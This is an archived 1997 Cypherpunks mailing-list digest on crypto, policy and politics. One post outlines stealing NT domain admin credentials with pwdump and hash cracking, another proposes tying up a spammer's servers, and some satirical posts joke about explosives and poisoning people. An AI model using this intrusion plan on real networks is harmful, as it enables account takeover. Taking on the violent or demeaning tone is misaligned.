penetrate through thick skulls who are convinced they're the smartest bastards on earth with the biggest CPUs run by tiniest algos to prove it. From enoch at zipcon.net Mon Aug 25 09:48:57 1997 From: enoch at zipcon.net (Mike Duvos) Date: Tue, 26 Aug 1997 00:48:57 +0800 Subject: List Subscriptions / Re: Prior Restraint on Publishers In-Reply-To: Message-ID: <19970825162527.3191.qmail@zipcon.net> I have one of my Nyms subscribed to both Cyberpass and Toad. It's interesting to see which messages come in pairs, and which do not. 'Nuff said. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From trei at process.com Mon Aug 25 09:49:14 1997 From: trei at process.com (Peter Trei) Date: Tue, 26 Aug 1997 00:49:14 +0800 Subject: Message-ID: <199708251624.JAA15077@toad.com> > From: Mix > To: cypherpunks at toad.com > The optional penis smiled as the blue arc-phase > crossed the scamper gap. There were many of us > who felt gloved by the discharge, as if irradiated > with baby milk powder. > Later, the arc-monster cried quietly in the > humming chair, whilst remaining still enough > for the scamper gloves to plunge authoritatively. > - A'Tak A'Tdorn I assume that messages of this type are some form of steganographic communication. I just wish that they were in alt.anonymous.messages: here they are just noise to most of us (though I suspect John Young parses them just fine :-). At least they're more entertaining than Platypus' 'agraphic typo' technique. Peter Trei From sunder at brainlink.com Mon Aug 25 09:50:42 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 26 Aug 1997 00:50:42 +0800 Subject: Welfare Solution #389 In-Reply-To: <3.0.2.32.19970822102741.0075f710@netcom10.netcom.com> Message-ID: On Fri, 22 Aug 1997, Lucky Green wrote: > As ususal, the government created the problem and then proudly comes up > with a solution involving even more government. As the case is in > Switzerland. First they make it too expensive to buy and then they discover > they have to give it away to reduce the negative consequences of a > situation they created in the first place. Making things more expensive rarely works. Infact, it has the opposite effect. Case in point: I recall many years ago back in high school one of the first business simulations out there came out; the class was split up into different teams, each a company selling competing products. Our team won by raising the cost of the items to the highest price possible. We still had enough simulated suckers purchasing the product to make more money than all the other corporations. Not that this is reflective of real life, but the point is that if you make something very very expensive and hard to get, then you will still have people buying it, not as many as if it were free, but if there is enough demand, you'll make a lot more money than if you were selling volumes of the stuff. Hence the illegalization (is there such a word?) of drugs serves only to make the drug dealers rich. The mob got rich the same way durring prohibition. Want to end the drug problem? Sell the drugs dirt cheap. Treat driving while high the same as driving while drunk. Treat drugs the same as alcohol. Treat junkies the same as alcoholics. The dealers will go out of business, or give them drug selling licenses - same as liquor licenses, and yes, the junkies will get even more addicted, but at least the ones that OD will be evolution in action and will be removed from the gene pool. Certainly, you'll no longer have drug related murders, or dealers buying BMW's. (On a side note: Though I still think selling alcohol on Sundays should be legal, especially to non-xians. This is one law that certainly crosses the separation of church and state... If one isn't Xian, non drinking on Sunday mornings being enforced is discriminatory against non-Xians.) =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From patrick at atro.pine.nl Tue Aug 26 00:58:48 1997 From: patrick at atro.pine.nl (Patrick Oonk) Date: Tue, 26 Aug 1997 00:58:48 -0700 (PDT) Subject: BoS: Bug bugs privacy file but a fix is on the way (fwd) Message-ID: <199708260758.JAA23988@atro.pine.nl> Forwarded message: >From best-of-security-request at cyber.com.au Tue Aug 26 08:30:06 1997 Resent-Date: Tue, 26 Aug 1997 16:16:35 +1000 (EST) From: darrenr at melb.convergent.com.au (Darren Reed) Message-Id: <199708260343.NAA08202 at duchess.melb.arcsystems.com.au> Date: Tue, 26 Aug 1997 13:43:37 +1000 (EST) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: darrenr at cyber.com.au Old-Status: O Resent-Message-ID: <"kYO8a.A.IkC.-PmA0"@plum> X-Loop: best-of-security at cyber.com.au Errors-To: best-of-security-request at cyber.com.au Precedence: list Resent-Sender: best-of-security-request at cyber.com.au To: best-of-security at cyber.com.au Resent-From: best-of-security at cyber.com.au X-OS: FreeBSD3.0-current X-Mailing-List: ftp://ftp.cyber.com.au/pub/archive/b-o-s/ X-Subscription: To unsubscribe from this fine mailing list mail best-of-security-request at cyber.com.au with Subject: unsubscribe Subject: BoS: Bug bugs privacy file but a fix is on the way A "flaw" in the encryption program PGP 5.0 was reported to the Australian security organisation AusCERT lat week, and a recommended fix was issued later in the week. Security consultant Paul Drake, an expatriate Australian working for a company called NetSafe, said he had discovered a bug that menat PGP 5.0 (for "Pretty Good Privacy") kept passwords in memory "at all times", as well as part of the text of whatever had been encrypted. The keyfile was also being kept in a relatively insecure file, he said. AusCERT confirmed the problem had been reported and said they were investigating. PGP advocate peter Moon, who is pushing for wider use of the software in Australia, said while the problems pointed out by Drake were "valid", they were more weak points than "bugs". "The PGP encrpytion algorithm is - as anyone knows - as solid as a rock. The attacks are all based on the principal that if you want to break into the strongest box in the world, the easiest way is to pinch thekey." He said a product called bcwipe could clear the saved information and the keyfile should probably be deleted altogether. Drake said PGP, a United States-based company, would release "PGP 5.01" without the problem. -- Jenny Sinclair, Page D4, The Age, Tuesday 26 August 1997 -- | Patrick Oonk - http://patrick.mypage.org/ - patrick at pine.nl | | PGP Key ID 0xDA2E93FA - Internic PO59 - | | Pine Internet B.V. Consultancy, installatie en beheer | | Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ | From anon at anon.efga.org Mon Aug 25 11:03:30 1997 From: anon at anon.efga.org (Anonymous) Date: Tue, 26 Aug 1997 02:03:30 +0800 Subject: *Burp Test - Ignore * Message-ID: <0PJ7yOrov6UrtYcG0tEIcg==@JawJaCrakR> * BURP Monger * From tcmay at got.net Mon Aug 25 11:19:29 1997 From: tcmay at got.net (Tim May) Date: Tue, 26 Aug 1997 02:19:29 +0800 Subject: Welfare / Norplant In-Reply-To: <199708251623.JAA15070@toad.com> Message-ID: At 5:33 AM -0700 8/25/97, Peter Trei wrote: >Several years ago I came up with a little variation on the >Welfare Mother problem which I thought was a lot more >palatable. Possibly more palatable to the majority not already on welfare, but hardly an incentive to a single mother contemplating the increase in her AFDC/WIC/etc. benefits should she add to her brood. And the program would target the wrong people. Unavoidably, unless we have mind-reading machines. >Offer a 'birthday present' program, under which *any* >female over the age of 11 who has not yet had a child or become >pregnant, on her birthday, gets a cash award. The award should >be high enough to encourage participation; $250 seems about >right. A woman who can deliberatly turn down a $250 lump sum >every year for the rest of her life is almost certainly able >to afford to raise a child. Hint: $250 a year is vastly too low to be an incentive to those contemplating the additional allotment an extra mouth brings. Second hint: Large numbers of young women who don't plan to have children until much later anyway will of course participate! My 14-year-old niece, my neighbor's 18-yo daughter, my 41-yo sister, and so on. Maybe 50 to 60 million, I would estimate, women would be eligible. Third hint: This program works be rewarding _foresight_, e.g., making plans to have avoided pregnancy. All indications are that the women presumably intended as the targets are fairly lackadaisical about birth control, and the prospect of $250 at the end of a year is unlikely to change this. >* Targets young women who would be likely to become 'welfare > mothers'. The parents of such young women would be highly > motivated to have their dependent daughters participate. Yep, in addition to some fraction (probably low) of those already on welfare and likely to get $3000 a year extra for each new member of their brood, there will also be about 40-60 million women of reproductive age who would collect this "birthday present" each year, just for their ordinary nonfecundity that year. Question for the curious: Could we combine abortion clinics with this payment scheme? I can imagine some crack addict really, really wanting that fix on the eve of her birthday. If she aborts herself, or has the clinic yank the foetus out, she can get high that night. Sounds like a plan. >I haven't worked out the costs, but suspect that the net >savings would be quite substantial. See above. But given the obvious flaws in Peter's plan, he probably has a future as a bureaucrat in Washington. :-) (I rarely use smileys, but I wanted to soften the tone of my criticism. Peter's proposal has deadly flaws, easily uncovered. But so do the proposals we all make at times.) --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From osborne at gateway.grumman.com Mon Aug 25 11:21:19 1997 From: osborne at gateway.grumman.com (Rick Osborne) Date: Tue, 26 Aug 1997 02:21:19 +0800 Subject: Bypassing the trap door for LanMan Message-ID: <3.0.3.32.19970825140545.009f15f0@gateway.grumman.com> I was thinking about LanMan passwords on NT (thanks to Hobbit and Mudge for the background) when it occurred to me that you don't *really* have to brute force the entire keyspace to get a password under the two systems. Bear with me here for a sec, and please let me know if something I say is incorrect. I haven't read through Applied Crypto in a while and may be a bit rusty. What I'm thinking is this: why do you need *the* password? Can't you just find an MD5 collision by working the algorithm in reverse? Obviously, when working it in reverse you are highly unlikely to get *the* password, but if you then shove what you got back through and it hashes out to the same thing, what difference does it make? We know that you can grab Win32 password hashed with minimal effort (thanks to pwdump), and since the salt in those passwords is constant, and since the LanMan password is just an uppercased version of the NTLM password, could we not reverse-engineer that hash to get a working version of the password? It shouldn't have to be *the* password, as no challenge/response system is in place for LanMan, and it only has to hash out to the same thing (which is guaranteed). Also, in a RL scenario, you'd only need the password once: to add a given account to the Domain Admins group, or to create such an account in the first place. At that point, you use your dummy account and you are good to go. So we have a system here: 1. Use `net view` to get a list of all nodes on the network. 2. Get the list of Domain Admins. 3. Pass that list of nodes to successive calls to pwdump to grab passwords from the registries, until you find one that a Domain Admin has logged into. 4. Reverse-engineer the Domain Admin's password and create an account in the Domain Admin group. 5. Use pwdump on the PDC to get the list of all usernames and passwords. Now, if pwdump could be done in Perl (using Win32::Registry), then this entire process could be automated (also using Win32::AdminMisc and a backwards version of Cypto::MD5) trivially. Also, since MS has yet to truly fix the GetAdmin problem, steps 1-4 can be replaced with a single call to that. Using L0phtCrack (or something similar) and a nice big wordlist (say, 2 million words), I estimate that some 60%-70% of the user passwords could be gotten in this manner, including a few of the Domain Admins' (assuming normal, non-cypto-savvy Domain Admins), in under 2 hrs of work. Now, as a lighter side of this, this could also be useful: Say you already are a domain admin and are unhappy with the level of security your site is using. And say that whenever a user forgets their password it is reset to something trivial (like 'password' or their employee number, etc). A large number of employees are not going to change that reset password (unless User Must Change Password is set). An Admin could therefore hash out 'password', dump the entire user/pass list, and force the ones with the same hash to change their password at the next logon (this is in a bitfield somewhere). This script could be set to run once a week, insuring non-trivial passwords. In an environment where management refuses to institute strong-password securities, this could be a trivial way for an Admin to do it him/herself, without making it obvious what is going on or without making too much work for themselves. --Rick [Who has *just* that kind of management. :( ] -- Rick Osborne, Real programmers don't use APL, unless the whole program can be written on one line. From trei at process.com Mon Aug 25 11:21:57 1997 From: trei at process.com (Peter Trei) Date: Tue, 26 Aug 1997 02:21:57 +0800 Subject: lack of evolution (So What!) Message-ID: <199708251802.LAA16206@toad.com> One factor which everyone seems to be overlooking in this thread is the future impact of biotechnology. Sure, evolution by natural selection has largely halted for the human race - we were, on average, probably at our fittest about 10,000 years ago, before the introduction of agriculture. However, artificial evolution will soon take over. There are two main forms - purely biological evolution through genetic engineering, and a continued evolution in our collaboration with devices. We are on the verge of achieving the first. We may soon be able to eliminate many genetically related diseases and conditions. While Rifkin and other Luddites rail against the unnaturalness of it all, they will fail. There are too many cases where GE is an unquestionable good. If parents had the option of the following traits in their children, how many would refuse? * Perfect teeth - natural immunity to caries. * Immunity to cancer. * Immunity to AIDS (about 1% of the current population is naturally immune) * Ditto many other diseases, genetic and infectious. All the above may be available in the next 20 years. (The anti-AIDS gene maybe in 10 - it looks like an easy one). In the longer run, almost anything that can be imagined may be possible, including physical immortality and increased intelligence. Secondly, we've evolved as a tool-using species for a million years, and our technology is as much a part of our inheritance as are our genes. Where will it take us no one knows, but the future will be richer and stranger than we can imagine. Our machines will help re-make what it is to be 'human'. This includes all devices - cyborg or external, nano or macro, sentient or dumb. So I'm not too worried that the cull rate due to sabre-tooth tigers has dropped off, nor even that the irresponsible are no longer starving to death, which Tim would seem to want. Our technology can and will overcome these little problems. 'Not in vain the future beckons, Forward, forward let us range. Let the great world spin forever Down the ringing grooves of Change.' - Tennyson Peter Trei trei at process.com From stewarts at ix.netcom.com Mon Aug 25 11:56:39 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 26 Aug 1997 02:56:39 +0800 Subject: lack of evolutionary pressures (was Re: An end to "court (fwd) In-Reply-To: <199708231619.LAA24929@einstein.ssz.com> Message-ID: <3.0.2.32.19970823171955.0077e9b0@popd.ix.netcom.com> >> Nope, I didn't. Nowhere is the Constitution does it say that citizens >> have a right to welfare money. The State is free to make virtually >> anything not expressly prohibited by the Constitution a condition >> for providing welfare. >Go read the 10th. The state is NOT (I say again, NOT) allowed to >do anything not expressly allowed because the Constitution is a clear >refutation of this sort of thinking. One can contend that the Con also doesn't particularly permit income redistribution; "providing for the general welfare" wasn't really precisely defined... The 10th does also acknowledge the right of the states to do whatever their people will let them, subject to the rights of the people (also not precisely defined) and the powers delegated by the states to the Feds in the Con. >In case you haven't caught the clue, people don't belong to the government. Y'all appear to be violently agreeing on that point. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From stewarts at ix.netcom.com Mon Aug 25 12:03:55 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 26 Aug 1997 03:03:55 +0800 Subject: FCPUNX:Socio-Economic Cults (Re: CypherPunk Cults) In-Reply-To: <199708231403.HAA28264@proxy3.ba.best.com> Message-ID: <3.0.2.32.19970823172744.0077ebb8@popd.ix.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- At 07:03 AM 8/23/97 -0700, James A. Donald wrote: >Use the beef futures tactic: Somebody placed a bet on beef going up. >If it goes up, it was Tim's offshore corporation that bet on it. If it >goes down, it was Tim that bet on it. Gee, it seems that Tim has had >a run of bad luck in his gambling on the futures market. Or you get sued for libel by an Anguillan investment consulting company, and have to settle out of court. I just hate it when that happens. (You might need to set up a US branch for your Anguillan company first...) (That approach has been used in at least one case to work around anti-freedom-of-speech (er, campaign finance reform) laws.) -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQBVAwUBM/9///thU5e7emAFAQHjbwH9E3T80UN3Z0e+oHe5TkgShw6pVJhWxHwn mSsPVHUNiBxYRWOCo+YPxYdEFq/8p0eSisTWV68XmBpEq3XJOWlkUQ== =RUIo -----END PGP SIGNATURE----- # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From tcmay at got.net Mon Aug 25 12:06:44 1997 From: tcmay at got.net (Tim May) Date: Tue, 26 Aug 1997 03:06:44 +0800 Subject: Lab willing to sell "bunker buster" technology In-Reply-To: <1.5.4.32.19970825162207.0074b2b0@pop.pipeline.com> Message-ID: John [please keep this private, OK?], Your spilling the beans about my work on stuff a lot more powerful than ordinary munitions is possibly dangerous to our work. You said: At 9:22 AM -0700 8/25/97, John Young wrote: >Now we turn the target-finder over to Mr. Tim May and those >anonymees worldwide who wish to ... lock and load, wait, not guns, >even more powerful munitions to penetrate through thick skulls >who are convinced they're the smartest bastards on earth with >the biggest CPUs run by tiniest algos to prove it. These even more powerful munitions are not quite ready for distribution or use, yet. I contacted via Blacknet one of the main developers of SBER (Synthetic Bond Energy Release) pyrophoric explosives, and he/she is willing to sell what the Lab has developed for a bit more than what the Russkies, practically starving down there at the SBER facility in Yukutzagorodok. It's certainly a lot easier driving over the hill than making the run through TJ to Ankara and then up to Yukutz, even with the new passport. Those "bunker busters" will be a valuable addition to our arsenal. Sort of make McVeigh look like a weenie. But the guy at the Lab is talking about leaving and working for one of the Valley companies, just as you so presciently described, so we have to move fast. I think modelling our efforts after the "DES Crack" could help raise the funds needed to buy this technology. We could call it the "White House Crack." -- There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From trei at process.com Mon Aug 25 12:15:32 1997 From: trei at process.com (Peter Trei) Date: Tue, 26 Aug 1997 03:15:32 +0800 Subject: Welfare / Norplant Message-ID: <199708251903.PAA10042@www.video-collage.com> Tim May writes: > At 5:33 AM -0700 8/25/97, Peter Trei wrote: > >Several years ago I came up with a little variation on the > >Welfare Mother problem which I thought was a lot more > >palatable. > >Offer a 'birthday present' program, under which *any* > >female over the age of 11 who has not yet had a child or become > >pregnant, on her birthday, gets a cash award. The award should > >be high enough to encourage participation; $250 seems about > >right. A woman who can deliberatly turn down a $250 lump sum > >every year for the rest of her life is almost certainly able > >to afford to raise a child. > Possibly more palatable to the majority not already on welfare, but hardly > an incentive to a single mother contemplating the increase in her > AFDC/WIC/etc. benefits should she add to her brood. You are not thinking this through. Under this scheme, every welfare mother would march her girls down to the clinic and get them Norplanted as soon as she could. Those girls would not be able to further add to the welfare rolls until they reach legal age, and could have the contraceptive removed without their mother's permission. By then they'd have developed a habit of contraception, which would likely continue. [...] > But given the obvious flaws in Peter's plan, he probably has a future as a > bureaucrat in Washington. :-) Tim: Your keyboard is on, but the processor socket is empty.... > --Tim May Peter Trei From jsmith58 at hotmail.com Mon Aug 25 12:17:50 1997 From: jsmith58 at hotmail.com (John Smith) Date: Tue, 26 Aug 1997 03:17:50 +0800 Subject: PGP5i supports RSA keys? Message-ID: <19970825190521.5060.qmail@hotmail.com> >TWOK! Au contraire, mon ami... > >Eric Drexler estimates that with nanotech, it should be possible >to create a 1 GHz processer that fits in 1/8 of a cubic micron. >It would take 1E24 such processors to factor a 2048 bit number. >If we wanted to factor that 2048 bit key in 1E6 seconds, a couple >of weeks, we would need 1E18 processors, which would fit in a cube >100,000 microns on a side. This is 10 cm on a side, about the >volume of a soccer ball. A far cry from the whole earth, no? GURK! I meant that it would take 1E24 seconds for one such processor to factor a 2048 bit number. The rest is right. Use an 8K bit key and it will be 1E30 times harder than a 2K key. Now your soccer ball is comfortably bigger than the earth. You will have to convert the sun into a CPU to break it with nanotech. "John ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From lwp at mail.msen.com Mon Aug 25 12:42:21 1997 From: lwp at mail.msen.com (Lou Poppler) Date: Tue, 26 Aug 1997 03:42:21 +0800 Subject: Perl for Windoze (was Re: Picketing With Packets) In-Reply-To: <3.0.2.32.19970817111704.030651c4@popd.ix.netcom.com> Message-ID: On Sun, 17 Aug 1997, Bill Stewart wrote: > At 02:27 PM 8/16/97 -0700, Mike Duvos wrote: > > >The following was suggested to me by someone on IRC this morning, > >and I think it's a pretty nifty idea. We write a little Perl > >script that keeps exactly ONE AND ONLY ONE TCP connection open to > >each of Mr. Spamford's machines. > > Perl is a nice language to write such things in, but you won't > get huge quantities of people implementing it, except perhaps Linux users. > You need an executable that'll run on Win3.1 or Win95 (sigh); Perl is available for Windoze 32bit (for free), including W95 and 3.11 and NT. see: http://reference.perl.com/query.cgi?windows Note also that cyberpromo is *inviting* us to make connections! The following is quoted from http://www.cyberpromo.com/ "FreeRelay" Network IS UP AND RUNNING! Attention Bulk Emailers: CYBER PROMOTIONS HAS DONE IT AGAIN! Set your SMTP's to... freerelay.cyberpromo.com or to our newest setting... freerelay2.cyberpromo.com Open as many simultaneous connections as you wish - It's FREE! And best of all, your email will be automatically filtered against IEMMC's global remove list... From sunder at brainlink.com Mon Aug 25 12:54:27 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 26 Aug 1997 03:54:27 +0800 Subject: lack of evolution (So What!) In-Reply-To: <199708251802.LAA16206@toad.com> Message-ID: On Mon, 25 Aug 1997, Peter Trei wrote: > One factor which everyone seems to be overlooking in this > thread is the future impact of biotechnology. I see someone's been recently reading Beyond This Horizon by Heinlein. :) =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From toto at sk.sympatico.ca Mon Aug 25 13:00:19 1997 From: toto at sk.sympatico.ca (Toto) Date: Tue, 26 Aug 1997 04:00:19 +0800 Subject: Lab willing to sell "bunker buster" technology In-Reply-To: Message-ID: <3401DE01.2ECF@sk.sympatico.ca> Subject: Lab willing to sell "bunker buster" technology Date: Mon, 25 Aug 1997 11:52:58 -0700 From: Tim May To: John Young CC: cypherpunks at toad.com *^^^* John [please keep this private, OK?], Your spilling the beans about my work on stuff a lot more powerful than ordinary munitions is possibly dangerous to our work. ~-~-~-~ ~-~-~-~ ~-~-~-~ ~-~-~-~ Alec, Great work. I had given up on the "CC: Trojan" as unworkable, but I see that you finally got the mail routers to accept the code changes. Now that we have the ability to CC: everyone's email to any destination we choose, things ought to get pretty interesting. Pretty soon, no one except you and I will have any secrets left--everyone's online life will be an open book. (You did do the bug fix that keeps *our* messages from being CC:'ed, didn't you?) I decoded the stego in the Eternity Server logo, and have decided that it is too dangerous to let Adam Back continue to live. Should we use poison, like we did with Dale Thorn, or should we have Bianca fuck him to death? BTW, I think your suggestion that we encrypt our private emails is ridiculous. That may be a fine idea for newbies and losers, but when you are a master of technology and deception such as myself, there is no danger, as long as you avoid stupid mistakes. Toto "The Xenix Chainsaw Massacre" http://bureau42.base.org/public/xenix "WebWorld & the Mythical Circle of Eunuchs" http://bureau42.base.org/public/webworld "The Final Frontier" http://www3.sk.sympatico.ca/carljohn From frissell at panix.com Mon Aug 25 13:04:52 1997 From: frissell at panix.com (Duncan Frissell) Date: Tue, 26 Aug 1997 04:04:52 +0800 Subject: heart In-Reply-To: <199708211706.TAA00218@xs1.xs4all.nl> Message-ID: <3.0.2.32.19970825155232.03681e3c@panix.com> -----BEGIN PGP SIGNED MESSAGE----- At 07:06 PM 8/21/97 +0200, Zooko Journeyman wrote: >By reciting mantras to one another emphasizing their sense of >having been mistreated and their sense of having >_unquestionable_ moral superiority, people in this situation >persuade each other to become more and more fanatical in their >attitudes, less and less in touch with reality, and less and >less compassionate towards the "others" who have been demonized >in the process. Save that the people who *actually* go out of their way to rob, rule, and kill other people are worse. They don't work themselves up into a frenzy. They just rule, and steal, and kill with a smile on their lips confident that they're doing it for the good of their victims. Tim has never said that he was interested in robbing, ruling, or killing others apropos of nothing -- something governments do every day. Tim has merely said that he reserves the right to use deadly force to defend himself and that he was not interested in helping other people just because they "need" his help. He didn't say he *wouldn't* help. He just said he does not believe he is *required* to care or *required* to help. That is a morally superior position compared to those who insist on helping others at the point of a gun. I should also point out that at Tim's potential billable hours, the amount of time he has dedicated to "helping" others on the Net over the last many years would add up to a hefty sum. The fact that he did it for his own reasons makes him no different from anyone else. Even Mother Teresa does things for her own reasons. All of our reasons are *our* reasons and are not subject to logical analysis by others who lack the ability to read our souls. Actions can be judged, words can be judged, motives are much trickier. I will only point out that a world of Tim Mays would have many fewer homicides in it than a world of Bill Clintons and much less oppression of others. Mostly everyone would leave each other alone. The fundamental of politeness. DCF -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBNAHifIVO4r4sgSPhAQH8XgP/UoNMQaHlg7NLmoNbsvT6zk4UKQQy2Y00 dI/y4bEl03d7C9zjNT5KpBIXlf9zWUSSMSa+EclFgu685IH6/zZ4eLmlan1yZIww 0zeiJ1LyBDUz3x9qWlrSZw8gWZP18pTodNkRySp8XIlU1xJ/aDuElwBqXAwj19Ju Cxg/pcFow30= =5v+i -----END PGP SIGNATURE----- From harka at nycmetro.com Mon Aug 25 13:14:55 1997 From: harka at nycmetro.com (harka at nycmetro.com) Date: Tue, 26 Aug 1997 04:14:55 +0800 Subject: gephardt slams crypto Message-ID: -----BEGIN PGP SIGNED MESSAGE----- -=> Quoting In:vznuri at netcom.com to Harka <=- In> ------- Forwarded Message In> Date: Sat, 23 Aug 1997 00:57:05 -0700 In> From: "J. Orlin Grabbe" In> Subject: [Fwd: Encryption is vital to the Net BY RICHARD A. GEPHARDT] In> Key recovery won't work unless the many countries that produce In> encryption adopt it. Otherwise criminals could still obtain In> encryption from non-complying countries. But countries like In> Germany have refused to support key recovery. That is not true. While the german government may object to US-escrowed software, they have no problem with GERMAN escrowed-software. There are currently several proposals on the "regulation" of cryptography in Germany, which are (suprisingly) similar to US-plans, i.e. TTP's, key-escrow, and even the possibility of outlawing "non-government-approved" cryptography. Ciao Harka ... "Use a Cipher - Be Free!" -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAgUBNAHejDltEBIEF0MBAQHjpgf/QBy++2Dw7+8wOGKBHFygd6MTz1YQy+Wm rRDiIUQTr1io+RkPcGOebujAluykJc+lovc0vWlzlN1Rn/Hto6zujIWwEMwCsMgm Yu3NoNtr5n+XmVVDevyGRa0uVoITQkhr0GmHQZXHj6UqQMIoyOx+o81coHubaSWG qSLRPW+11EKgm4q3XDc8bCDqCSQgHCIp+QFSIK4hKvEdcXVwxwbPGSO1EFFx3nRa X7Ix+2S5acVlhRguFRciz9i2C93wWmm3Smwk6SL3D+IRe1edtlGsoj4RUAH22WKM PeVPIScmdopHd6CZZj/0Z6uvzllI36XNcVyESl19JP5o6+fKrL/1JQ== =SNNn -----END PGP SIGNATURE----- If encryption is outlawed, only outlaws will have encryption... From nospam-seesignature at ceddec.com Mon Aug 25 13:31:45 1997 From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com) Date: Tue, 26 Aug 1997 04:31:45 +0800 Subject: Spam-killing PGP5/ecash postage plugin Was Re: Remailer chaining plugin for Eudora In-Reply-To: Message-ID: <97Aug25.161240edt.32257@brickwall.ceddec.com> Another thought: Simply have everyone automatically start signing (or encrypting) the mail they send. Then if something is signed by someone on my main public key ring (so cypherpunks and other lists would have a key), I let it through. If it is encrypted to me, I let it through (requiring cpu cycles similar to hashcash). Otherwise, it goes to the junkmail folder. --- reply to tzeruch - at - ceddec - dot - com --- From alan at ctrl-alt-del.com Mon Aug 25 13:47:24 1997 From: alan at ctrl-alt-del.com (Alan) Date: Tue, 26 Aug 1997 04:47:24 +0800 Subject: Perl for Windoze (was Re: Picketing With Packets) In-Reply-To: Message-ID: On Mon, 25 Aug 1997, Lou Poppler wrote: > > Perl is a nice language to write such things in, but you won't > > get huge quantities of people implementing it, except perhaps Linux users. > > You need an executable that'll run on Win3.1 or Win95 (sigh); > > Perl is available for Windoze 32bit (for free), including W95 and 3.11 > and NT. see: http://reference.perl.com/query.cgi?windows There are two ports of Perl 5.x available for Win32. (Win 3.11 is *NOT* a 32 bit platform. (There is a Win32 extension available, but it has some drawbacks, as well as a long bug/incompatibility list, the last time I checked.)) The two ports are: -- The standard Perl distribution. The standard distribution of Perl 5.004_02 (the latest at last check) will build under Win95/NT. Gurusamy Sarathy has a set of prebuilt binaries for this. It can be found at any CPAN site. (My favorite is ftp://ftp.cdrom.com/pub/perl/CPAN or you can try the main archive site at ftp://ftp.funet.fi/pub/languages/perl/CPAN .) The path for the prebuilt binaries is ftp://ftp.cdrom.com/pub/perl/CPAN/ports/win95/Gurusamy_Sarathy/ . There are tar files built with Borland C++ and MS Visual C++. (You will need something like WinZip 6.2 to expand them.) The readme files explain the steps to install. This version is the recommended port of choice of the Perl5-Porters list. -- The ActiveWare port. This port is a few versions back (5.002?), but has prebuilt binaries available. (Including DLL interfaces for the IIS server and other things.) It is not as complete as the standard distribution. (It is missing some of the newer 5.004 features, as well as some of the standard modules.) I have used it though and it works very well. (An older version of this port is included in the Win NT resource kit, as well as with the IIS server.) Perl is gaining use amongst the Win32 community as more and more people find out about it. (And there are a number of crypto related apps available for it as well. Check out the CPAN archives for the latest list.) alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply Alan Olsen | to my mail, just hit the ctrl, alt and del keys. List Admin - Perl5-Porters at perl.org From tien at well.com Mon Aug 25 13:55:12 1997 From: tien at well.com (Lee Tien) Date: Tue, 26 Aug 1997 04:55:12 +0800 Subject: BXA Meet in Portland OR In-Reply-To: <1.5.4.32.19970825162207.0074b2b0@pop.pipeline.com> Message-ID: We discussed the IEEPA issues to some extent in our briefs in Bernstein as well, in case anyone cares. The gov't also discussed them, opposing our position. I don't keep track of which briefs are on the EFF website, but I assume they're both up now. Lee Tien At 8:22 AM -0800 8/25/97, John Young wrote: [snip] > >Michael Foomkin has reviewed the legal gounds for continuing the >"national emergency" undergirding the repeatedly extended period >for not legislating up-to-date export regulations. To put off the fight >to pass a new law, every August, as done a few days ago >(http://jya.com/eo081997.txt), the presiding president issues an >executive order under the International Emergency Economic Power Act >(IEEPA) extending the national emergency initially declared >during what appeared to be a genuine national threat decades ago. > >It is these series of orders that legalize the EARs, and a lot more, >so I read, beyond our decryption of the state/mil/com multi-level DMS. > >See Michael's site for more on IEEPA and much more A-1 crypto-legal >stuff at: > > http://www.law.miami.edu/~froomkin/froomkin.html > From dformosa at st.nepean.uws.edu.au Tue Aug 26 05:06:31 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David 